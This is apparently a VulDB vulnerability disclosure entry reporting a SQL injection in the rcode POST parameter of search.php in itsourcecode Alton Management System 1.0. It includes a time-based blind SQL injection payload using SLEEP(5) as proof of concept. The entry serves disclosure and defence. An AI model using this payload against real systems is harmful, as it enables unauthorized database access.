Submit #381089: itsourcecode Alton Management System 1.0 SQLi search.php info

Title: itsourcecode Alton Management System 1.0 SQLi search.php
Description: The rcode parameter can be passed in for querying on the "search.php" page, but due to the code's lax filtering of this parameter, it can lead to SQL injection.

-------------------POC---------------
Parameter: rcode (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: rcode=1' AND (SELECT 7363 FROM (SELECT(SLEEP(5)))sBIE) AND 'vFRq'='vFRq

Source: https://github.com/DeepMountains/Mirage/blob/main/CVE8-1.md
User: Dee.Mirage (ID 71702)
Submission: 2024-07-27 12:20 (2 months ago)
Moderation: 2024-07-30 15:29 (3 days later)
Status: Accepted
VulDB Entry: 273142
Points: 20
